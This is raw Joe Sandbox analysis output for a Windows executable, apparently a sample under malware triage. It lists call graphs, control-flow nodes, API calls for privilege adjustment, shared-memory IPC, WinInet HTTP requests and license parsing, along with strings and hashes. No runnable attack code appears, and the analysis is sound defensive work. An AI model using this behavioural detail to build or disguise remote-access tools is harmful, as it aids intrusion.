63648->63647 63649 1116ba32 63648->63649 63693 1116d557 EncodePointer EncodePointer __init_pointers _doexit __initp_misc_winsig 63649->63693 63651 1116ba37 EncodePointer EncodePointer EncodePointer EncodePointer 63694 111735c2 InitializeCriticalSectionAndSpinCount 63651->63694 63653 1116ba76 63654 1116badd 63653->63654 63655 1116ba7a DecodePointer 63653->63655 63696 1116b64b 70 API calls _free 63654->63696 63657 1116ba8f 63655->63657 63657->63654 63658 11169dbe __calloc_crt 66 API calls 63657->63658 63659 1116baa5 63658->63659 63659->63654 63660 1116baad DecodePointer 63659->63660 63661 1116babe 63660->63661 63661->63654 63662 1116bac2 63661->63662 63695 1116b688 66 API calls 4 library calls 63662->63695 63664 1116baca GetCurrentThreadId 63664->63647 63666 11169dbe __calloc_crt 66 API calls 63665->63666 63667 111711e7 63666->63667 63667->63667 63668 1117135c 63667->63668 63670 11169dbe __calloc_crt 66 API calls 63667->63670 63672 11169506 63667->63672 63674 111712dc 63667->63674 63669 11171392 GetStdHandle 63668->63669 63671 111713f6 SetHandleCount 63668->63671 63673 111713a4 GetFileType 63668->63673 63677 111713ca InitializeCriticalSectionAndSpinCount 63668->63677 63669->63668 63670->63667 63671->63672 63672->63626 63672->63627 63673->63668 63674->63668 63675 11171313 InitializeCriticalSectionAndSpinCount 63674->63675 63676 11171308 GetFileType 63674->63676 63675->63672 63675->63674 63676->63674 63676->63675 63677->63668 63677->63672 63680 1116d5bc __IsNonwritableInCurrentImage 63678->63680 63697 1116c9cb EncodePointer 63680->63697 63681 1116d5da __initterm_e __IsNonwritableInCurrentImage 63681->63631 63682->63604 63683->63614 63684->63627 63685->63600 63686->63612 63687->63618 63688->63605 63689->63604 63690->63633 63691->63604 63692->63646 63693->63651 63694->63653 63695->63664 63696->63647 63697->63681 63698 110304b8 63699 11142a60 276 API calls 63698->63699 63700 110304c6 63699->63700 63701 11142bb0 84 API calls 63700->63701 63702 11030503 63701->63702 63703 11030518 63702->63703 63704 11081bb0 87 API calls 63702->63704 63705 110ed1a0 2 API calls 63703->63705 63704->63703 63706 1103053f 63705->63706 63707 11030589 63706->63707 63770 110ed250 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 63706->63770 63710 11142bb0 84 API calls 63707->63710 63709 11030554 63771 110ed250 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 63709->63771 63713 110305a0 63710->63713 63712 1103056b 63712->63707 63714 111463d0 19 API calls 63712->63714 63715 1110f420 std::locale::_Init 274 API calls 63713->63715 63714->63707 63716 110305af 63715->63716 63717 110305d0 63716->63717 63772 11088860 274 API calls 63716->63772 63749 1108a470 63717->63749 63720 110305e3 OpenMutexA 63721 11030603 CreateMutexA 63720->63721 63722 1103071a CloseHandle 63720->63722 63723 11030623 63721->63723 63724 1108a570 69 API calls 63722->63724 63725 1110f420 std::locale::_Init 274 API calls 63723->63725 63727 11030730 63724->63727 63726 11030638 63725->63726 63728 1103065b 63726->63728 63773 11060be0 280 API calls std::locale::_Init 63726->63773 63730 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 63727->63730 63760 11015c30 LoadLibraryA 63728->63760 63732 110310b3 63730->63732 63733 1103066d 63734 111450a0 std::locale::_Init 93 API calls 63733->63734 63735 1103067c 63734->63735 63736 11030689 63735->63736 63737 1103069c 63735->63737 63761 11145ae0 63736->63761 63739 110306a6 GetProcAddress 63737->63739 63740 11030690 63737->63740 63739->63740 63741 110306c0 SetLastError 63739->63741 63742 110281a0 47 API calls 63740->63742 63741->63740 63743 110306cd 63742->63743 63774 110092f0 417 API calls std::locale::_Init 63743->63774 63745 110306dc 63746 110306f0 WaitForSingleObject 63745->63746 63746->63746 63747 11030702 CloseHandle 63746->63747 63747->63722 63748 11030713 FreeLibrary 63747->63748 63748->63722 63750 1110f420 std::locale::_Init 274 API calls 63749->63750 63751 1108a4a7 63750->63751 63752 1108a4c9 InitializeCriticalSection 63751->63752 63753 1110f420 std::locale::_Init 274 API calls 63751->63753 63756 1108a52a 63752->63756 63755 1108a4c2 63753->63755 63755->63752 63775 1116219a 66 API calls std::exception::_Copy_str 63755->63775 63756->63720 63758 1108a4f9 63776 111625f1 RaiseException 63758->63776 63760->63733 63762 111450a0 std::locale::_Init 93 API calls 63761->63762 63763 11145af2 63762->63763 63764 11145b30 63763->63764 63765 11145af9 LoadLibraryA 63763->63765 63764->63740 63766 11145b2a 63765->63766 63767 11145b0b GetProcAddress 63765->63767 63766->63740 63768 11145b23 FreeLibrary 63767->63768 63769 11145b1b 63767->63769 63768->63766 63769->63768 63770->63709 63771->63712 63772->63717 63773->63728 63774->63745 63775->63758 63776->63752

                                                                                      Executed Functions

                                                                                      Function 1109E190 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501filethreadmemoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 716 1109e190-1109e1f2 call 1109d980 719 1109e1f8-1109e21b call 1109d440 716->719 720 1109e810 716->720 725 1109e221-1109e235 LocalAlloc 719->725 726 1109e384-1109e386 719->726 721 1109e812-1109e82d call 11161d01 720->721 728 1109e23b-1109e26d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 725->728 729 1109e805-1109e80b call 1109d4d0 725->729 730 1109e316-1109e33b CreateFileMappingA 726->730 731 1109e2fa-1109e310 728->731 732 1109e273-1109e29e call 1109d3a0 call 1109d3f0 728->732 729->720 734 1109e388-1109e39b GetLastError 730->734 735 1109e33d-1109e35d GetLastError call 1112ef20 730->735 731->730 762 1109e2e9-1109e2f1 732->762 763 1109e2a0-1109e2d6 GetSecurityDescriptorSacl 732->763 737 1109e39d 734->737 738 1109e3a2-1109e3b9 MapViewOfFile 734->738 746 1109e368-1109e370 735->746 747 1109e35f-1109e366 LocalFree 735->747 737->738 741 1109e3bb-1109e3d6 call 1112ef20 738->741 742 1109e3f7-1109e3ff 738->742 765 1109e3d8-1109e3d9 LocalFree 741->765 766 1109e3db-1109e3e3 741->766 744 1109e4a1-1109e4b3 742->744 745 1109e405-1109e41e GetModuleFileNameA 742->745 750 1109e4f9-1109e512 call 11161d20 GetTickCount 744->750 751 1109e4b5-1109e4b8 744->751 752 1109e4bd-1109e4d8 call 1112ef20 745->752 753 1109e424-1109e42d 745->753 754 1109e372-1109e373 LocalFree 746->754 755 1109e375-1109e37f 746->755 747->746 781 1109e514-1109e519 750->781 758 1109e59f-1109e603 GetCurrentProcessId GetModuleFileNameA call 1109d810 751->758 779 1109e4da-1109e4db LocalFree 752->779 780 1109e4dd-1109e4e5 752->780 753->752 759 1109e433-1109e436 753->759 754->755 761 1109e7fe-1109e800 call 1109d8c0 755->761 783 1109e60b-1109e622 CreateEventA 758->783 784 1109e605 758->784 768 1109e479-1109e49c call 1112ef20 call 1109d8c0 759->768 769 1109e438-1109e43c 759->769 761->729 762->731 773 1109e2f3-1109e2f4 FreeLibrary 762->773 763->762 772 1109e2d8-1109e2e3 SetSecurityDescriptorSacl 763->772 765->766 775 1109e3e8-1109e3f2 766->775 776 1109e3e5-1109e3e6 LocalFree 766->776 768->744 769->768 778 1109e43e-1109e449 769->778 772->762 773->731 775->761 776->775 785 1109e450-1109e454 778->785 779->780 786 1109e4ea-1109e4f4 780->786 787 1109e4e7-1109e4e8 LocalFree 780->787 788 1109e51b-1109e52a 781->788 789 1109e52c 781->789 793 1109e624-1109e643 GetLastError * 2 call 1112ef20 783->793 794 1109e646-1109e64e 783->794 784->783 791 1109e470-1109e472 785->791 792 1109e456-1109e458 785->792 786->761 787->786 788->781 788->789 795 1109e52e-1109e534 789->795 802 1109e475-1109e477 791->802 799 1109e45a-1109e460 792->799 800 1109e46c-1109e46e 792->800 793->794 803 1109e650 794->803 804 1109e656-1109e667 CreateEventA 794->804 797 1109e545-1109e59d 795->797 798 1109e536-1109e543 795->798 797->758 798->795 798->797 799->791 805 1109e462-1109e46a 799->805 800->802 802->752 802->768 803->804 807 1109e669-1109e688 GetLastError * 2 call 1112ef20 804->807 808 1109e68b-1109e693 804->808 805->785 805->800 807->808 809 1109e69b-1109e6ad CreateEventA 808->809 810 1109e695 808->810 812 1109e6af-1109e6ce GetLastError * 2 call 1112ef20 809->812 813 1109e6d1-1109e6d9 809->813 810->809 812->813 816 1109e6db 813->816 817 1109e6e1-1109e6f2 CreateEventA 813->817 816->817 819 1109e714-1109e722 817->819 820 1109e6f4-1109e711 GetLastError * 2 call 1112ef20 817->820 822 1109e724-1109e725 LocalFree 819->822 823 1109e727-1109e72f 819->823 820->819 822->823 825 1109e731-1109e732 LocalFree 823->825 826 1109e734-1109e73d 823->826 825->826 827 1109e743-1109e746 826->827 828 1109e7e7-1109e7f9 call 1112ef20 826->828 827->828 830 1109e74c-1109e74f 827->830 828->761 830->828 832 1109e755-1109e758 830->832 832->828 833 1109e75e-1109e761 832->833 834 1109e76c-1109e788 CreateThread 833->834 835 1109e763-1109e769 GetCurrentThreadId 833->835 836 1109e78a-1109e794 834->836 837 1109e796-1109e7a0 834->837 835->834 836->761 838 1109e7ba-1109e7e5 SetEvent call 1112ef20 call 1109d4d0 837->838 839 1109e7a2-1109e7b8 ResetEvent * 3 837->839 838->721 839->838
                                                                                      APIs
                                                                                        • Part of subcall function 1109D440: GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,4012B9B4,00080000,00000000,00000000), ref: 1109D46D
                                                                                        • Part of subcall function 1109D440: OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                        • Part of subcall function 1109D440: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                        • Part of subcall function 1109D440: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                      • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,4012B9B4,00080000,00000000,00000000), ref: 1109E225
                                                                                      • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E23E
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E249
                                                                                      • GetVersionExA.KERNEL32(?), ref: 1109E260
                                                                                      • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2CE
                                                                                      • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E2E3
                                                                                      • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2F4
                                                                                      • CreateFileMappingA.KERNEL32(000000FF,11030063,00000004,00000000,?,?), ref: 1109E330
                                                                                      • GetLastError.KERNEL32 ref: 1109E33D
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E366
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E373
                                                                                      • GetLastError.KERNEL32 ref: 1109E390
                                                                                      • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E3AE
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E3D9
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E3E6
                                                                                        • Part of subcall function 1109D3A0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E27E), ref: 1109D3A8
                                                                                        • Part of subcall function 1109D3F0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E412
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E4DB
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E4E8
                                                                                      • _memset.LIBCMT ref: 1109E500
                                                                                      • GetTickCount.KERNEL32 ref: 1109E508
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 1109E5B4
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E5CF
                                                                                      • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109E61B
                                                                                      • GetLastError.KERNEL32 ref: 1109E624
                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E62B
                                                                                      • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E660
                                                                                      • GetLastError.KERNEL32 ref: 1109E669
                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E670
                                                                                      • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109E6A6
                                                                                      • GetLastError.KERNEL32 ref: 1109E6AF
                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E6B6
                                                                                      • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E6EB
                                                                                      • GetLastError.KERNEL32 ref: 1109E6FA
                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E6FD
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E725
                                                                                      • LocalFree.KERNEL32(?), ref: 1109E732
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 1109E763
                                                                                      • CreateThread.KERNEL32(00000000,00002000,Function_0009DD20,00000000,00000000,00000030), ref: 1109E77D
                                                                                      • ResetEvent.KERNEL32(?), ref: 1109E7AC
                                                                                      • ResetEvent.KERNEL32(?), ref: 1109E7B2
                                                                                      • ResetEvent.KERNEL32(?), ref: 1109E7B8
                                                                                      • SetEvent.KERNEL32(?), ref: 1109E7BE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                      • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                      • API String ID: 3291243470-2792520954
                                                                                      • Opcode ID: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                      • Instruction ID: e0f3534def007632db5cc521867dfefedb1bc63d92e862916d16df31d0e36df5
                                                                                      • Opcode Fuzzy Hash: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                      • Instruction Fuzzy Hash: 221282B590026D9FE724DF61CCD4EAEF7BABB88308F0049A9E11997244D771AD84CF51
                                                                                      Function 11029590 Relevance: 88.0, APIs: 38, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 844 11029590-1102961e LoadLibraryA 845 11029621-11029626 844->845 846 11029628-1102962b 845->846 847 1102962d-11029630 845->847 848 11029645-1102964a 846->848 849 11029632-11029635 847->849 850 11029637-11029642 847->850 851 11029679-11029685 848->851 852 1102964c-11029651 848->852 849->848 850->848 853 1102972a-1102972d 851->853 854 1102968b-110296a3 call 11162b51 851->854 855 11029653-1102966a GetProcAddress 852->855 856 1102966c-1102966f 852->856 858 11029748-11029760 InternetOpenA 853->858 859 1102972f-11029746 GetProcAddress 853->859 865 110296c4-110296d0 854->865 866 110296a5-110296be GetProcAddress 854->866 855->856 860 11029671-11029673 SetLastError 855->860 856->851 864 11029784-11029790 call 11162be5 858->864 859->858 863 11029779-11029781 SetLastError 859->863 860->851 863->864 872 11029796-110297c7 call 11142290 call 11164390 864->872 873 11029a0a-11029a14 864->873 871 110296d2-110296db GetLastError 865->871 876 110296f1-110296f3 865->876 866->865 868 11029762-1102976a SetLastError 866->868 868->871 871->876 877 110296dd-110296ef call 11162be5 call 11162b51 871->877 894 110297c9-110297cc 872->894 895 110297cf-110297e4 call 11081a70 * 2 872->895 873->845 875 11029a1a 873->875 879 11029a2c-11029a2f 875->879 880 11029710-1102971c 876->880 881 110296f5-1102970e GetProcAddress 876->881 877->876 885 11029a31-11029a36 879->885 886 11029a3b-11029a3e 879->886 880->853 898 1102971e-11029727 880->898 881->880 884 1102976f-11029777 SetLastError 881->884 884->853 890 11029b9f-11029ba7 885->890 891 11029a40-11029a45 886->891 892 11029a4a 886->892 896 11029bb0-11029bc3 890->896 897 11029ba9-11029baa FreeLibrary 890->897 899 11029b6f-11029b74 891->899 900 11029a4d-11029a55 892->900 894->895 918 110297e6-110297ea 895->918 919 110297ed-110297f9 895->919 897->896 898->853 905 11029b76-11029b8d GetProcAddress 899->905 906 11029b8f-11029b95 899->906 903 11029a57-11029a6e GetProcAddress 900->903 904 11029a74-11029a7d 900->904 903->904 908 11029b2e-11029b30 SetLastError 903->908 913 11029a80-11029a82 904->913 905->906 909 11029b97-11029b99 SetLastError 905->909 906->890 911 11029b36-11029b3d 908->911 909->890 914 11029b4c-11029b6d call 110278a0 * 2 911->914 913->911 916 11029a88-11029a8d 913->916 914->899 916->914 920 11029a93-11029acf call 1110f4a0 call 11027850 916->920 918->919 923 11029824-11029829 919->923 924 110297fb-110297fd 919->924 942 11029ae1-11029ae3 920->942 943 11029ad1-11029ad4 920->943 926 1102982b-1102983c GetProcAddress 923->926 927 1102983e-11029855 InternetConnectA 923->927 929 11029814-1102981a 924->929 930 110297ff-11029812 GetProcAddress 924->930 926->927 932 11029881-1102988c SetLastError 926->932 933 110299f7-11029a07 call 111618c1 927->933 934 1102985b-1102985e 927->934 929->923 930->929 936 1102981c-1102981e SetLastError 930->936 932->933 933->873 939 11029860-11029862 934->939 940 11029899-110298a1 934->940 936->923 944 11029864-11029877 GetProcAddress 939->944 945 11029879-1102987f 939->945 946 110298a3-110298b7 GetProcAddress 940->946 947 110298b9-110298d4 940->947 950 11029ae5 942->950 951 11029aec-11029af1 942->951 943->942 949 11029ad6-11029ada 943->949 944->945 952 11029891-11029893 SetLastError 944->952 945->940 946->947 953 110298d6-110298de SetLastError 946->953 955 110298e1-110298e4 947->955 949->942 956 11029adc 949->956 950->951 957 11029af3-11029b09 call 110d1090 951->957 958 11029b0c-11029b0e 951->958 952->940 953->955 960 110299f2-110299f5 955->960 961 110298ea-110298ef 955->961 956->942 957->958 963 11029b10-11029b12 958->963 964 11029b14-11029b25 call 111618c1 958->964 960->933 968 11029a1c-11029a29 call 111618c1 960->968 966 110298f1-11029908 GetProcAddress 961->966 967 1102990a-11029916 961->967 963->964 970 11029b3f-11029b49 call 111618c1 963->970 964->914 975 11029b27-11029b29 964->975 966->967 973 11029918-11029920 SetLastError 966->973 979 11029922-1102993b GetLastError 967->979 968->879 970->914 973->979 975->900 980 11029956-1102996b 979->980 981 1102993d-11029954 GetProcAddress 979->981 983 11029975-11029983 GetLastError 980->983 981->980 982 1102996d-1102996f SetLastError 981->982 982->983 985 11029985-1102998a 983->985 986 1102998c-11029998 GetDesktopWindow 983->986 985->986 987 110299e2-110299e7 985->987 988 110299b3-110299cf 986->988 989 1102999a-110299b1 GetProcAddress 986->989 987->960 991 110299e9-110299ef 987->991 988->960 993 110299d1 988->993 989->988 990 110299d6-110299e0 SetLastError 989->990 990->960 991->960 993->955
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(WinInet.dll,4012B9B4,74DF23A0,?,00000000), ref: 110295C5
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102965F
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029673
                                                                                      • _malloc.LIBCMT ref: 11029697
                                                                                      • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110296B1
                                                                                      • GetLastError.KERNEL32 ref: 110296D2
                                                                                      • _free.LIBCMT ref: 110296DE
                                                                                      • _malloc.LIBCMT ref: 110296E7
                                                                                      • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029701
                                                                                      • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102973B
                                                                                      • InternetOpenA.WININET(11194244,?,?,000000FF,00000000), ref: 1102975A
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029764
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029771
                                                                                      • SetLastError.KERNEL32(00000078), ref: 1102977B
                                                                                      • _free.LIBCMT ref: 11029785
                                                                                        • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                        • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029805
                                                                                      • SetLastError.KERNEL32(00000078), ref: 1102981E
                                                                                      • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029831
                                                                                      • InternetConnectA.WININET(000000FF,11199690,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102984E
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102986A
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029883
                                                                                      • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110298A9
                                                                                      • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110298FD
                                                                                      • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029A63
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029B30
                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029B82
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029B99
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11029BAA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                      • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                      • API String ID: 921868004-913974648
                                                                                      • Opcode ID: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
                                                                                      • Instruction ID: e81a0880bf89439be6f70403065d0babe3f5b16467f55efefddb7e1ac6149969
                                                                                      • Opcode Fuzzy Hash: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
                                                                                      • Instruction Fuzzy Hash: 5E127FB0D04269EBEB11CFA9CC88A9EFBF9FF88754F604569E465E7240E7705940CB60
                                                                                      Function 11061C90 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11144EA0: GetLastError.KERNEL32(?,00EEB898,000000FF,?), ref: 11144ED5
                                                                                        • Part of subcall function 11144EA0: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00EEB898,000000FF,?), ref: 11144EE5
                                                                                      • _fgets.LIBCMT ref: 11061DC2
                                                                                      • _strpbrk.LIBCMT ref: 11061E29
                                                                                      • _fgets.LIBCMT ref: 11061F2C
                                                                                      • _strpbrk.LIBCMT ref: 11061FA3
                                                                                      • __wcstoui64.LIBCMT ref: 11061FBC
                                                                                      • _fgets.LIBCMT ref: 11062035
                                                                                      • _strpbrk.LIBCMT ref: 1106205B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                      • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                      • API String ID: 716802716-1571441106
                                                                                      • Opcode ID: 32dce6010c3087015648dbee5c865c0eda81171851eef29cc693b610d01e18e4
                                                                                      • Instruction ID: 9b454a0e08db4b844aa329f9a873b431930d9d904307df7fc69ae15b9a8492e5
                                                                                      • Opcode Fuzzy Hash: 32dce6010c3087015648dbee5c865c0eda81171851eef29cc693b610d01e18e4
                                                                                      • Instruction Fuzzy Hash: 55A2D375E0461A9FEB21CF64CC80BEFB7B9AF44345F0041D9E849A7281EB71AA45CF61
                                                                                      Function 11143570 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134libraryloaderCOMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
